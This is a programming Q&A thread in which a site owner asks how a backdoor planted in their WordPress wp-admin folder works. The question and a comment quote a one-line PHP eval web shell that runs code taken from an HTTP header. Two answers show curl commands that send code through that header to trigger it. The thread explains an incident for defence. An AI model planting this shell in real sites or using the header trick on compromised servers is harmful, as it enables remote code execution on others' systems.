# Can a hacker pass in parameters to $_SERVER?

Tags: php, wordpress, security, server

So our website unfortunately got hacked.

They created a file in our wp-admin directory called wp-update.php containing this code:

```
<?php @eval($_SERVER['HTTP_4CD44849DA572F7C']); ?>
```

My question is how can the hacker pass in his script using $_SERVER?

Comment: I recently discovered the same file in my wp-admin folder with the following code:
 <?php @eval($_SERVER['HTTP_60AA1E7BE689E06B']); ?>

Are you willing to compare the plugins that are installed on both of our websites to see what may be vulnerable?

Comment: Update: Upon further investigation, the hack is a result of the Adning Advertising plugin. Update to version 1.5.6 as soon as possible.

Comment: @Zeno Sorry for the late response, we are currently investigating Adning and have contacted the authors and Envato itself. Please refer to this topic if you seek more information: https://wordpress.org/support/topic/wp-admin-wp-update-a-virus/

Answer (score 3):

Yes a hacker can send data into $_SERVER, it contains HTTP headers (cf. [the documentation](https://www.php.net/manual/en/reserved.variables.server.php)) with a simple curl command you can inject data.

```
curl -H '4CD44849DA572F7C: echo "hello from server";' http://example.com
```

Answer (score 3):

Properties of the `$_SERVER` superglobal with names starting with `HTTP_` are just representations of the HTTP request headers.

Since request headers are completely under the control of whoever is making the request, it is trivial to insert data there.

Any HTTP client will let the attacker specify whatever headers they like. An example in cURL's command line client would look like:

```
curl -H "4CD44849DA572F7C: code goes here" http://example.com/your-hacked.php
```